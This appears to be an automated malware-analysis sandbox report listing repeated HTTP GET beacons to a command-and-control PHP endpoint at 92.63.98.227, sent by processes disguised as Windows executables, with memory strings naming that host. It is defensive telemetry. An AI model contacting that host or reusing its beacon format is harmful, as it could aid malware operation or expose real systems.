Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wsYGO6h0LRmQYvXEN53p=7MnpAezzgxv3Du1Mk5sQ2lfTWuMSKWM&wmzfuaObrApe1XUBf1mAKZHV=TSPRgpJkAGa4WcJrQi16Bc HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&wQNh6iKcIXveOYBNXdtL1aU9x=pRoMvshtb4vs48yjOeFXOMwTBTU44 HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?krK453gzkbHwQekvew09meNQ2x=b0r&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&krK453gzkbHwQekvew09meNQ2x=b0r HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&WuSiaDMYqv7WyHwlbBxUC=q8B8QMBG2uLAIvUeiK7j&e9sh7XbF5VpmuDThbw9Xk2MKx8BQ7dm=cmM9SbTzkA7Zg&YrB7GY8MYlwht=WLIctSJI0UOAdKwk5xnZkTPAWOYPNlM HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?2Axq4KFgntH6pOhfkXM061hX=JBth00EchN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&2Axq4KFgntH6pOhfkXM061hX=JBth00EchN HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&4DpgykXUnYal=5pRDw8u&VEaEdbRUQLKbDAyInpMt9jQQ58K=tH6x0e HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Universalsqlvoiddbpipe/local/3public/Line/Packet/CentrallongpollTestLinux/Wordpress/vm8/ProtonDb/TrackGeoCentral/async/Authvoiddbdb/tempimage9/imageCpuLocal.php?Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN&959480b0b628e0e0f7e21ad37808361f=145978ce6cedf15746edd31db8133721&1378154f7d7081a582cfedd1d437892d=gZ4IjY5IDNyMTM1gDO0YjYhVjZkdTN4YTYxImY0gTYyE2MxMjM0QmN&Kn=9wPdEYVChygSjocnzmqZ&hgvNjsg=VxIIw02dGT&kpm8m=fLo31XdN HTTP/1.1Accept: */*Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 92.63.98.227Connection: Keep-Alive
Source: StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.63.98.227
Source: StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000277A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.63.98.227(
Source: xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Unive
Source: xMLVfJVxhYAkoCJ.exe, 00000022.00000002.2260234358.00000000010FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic5
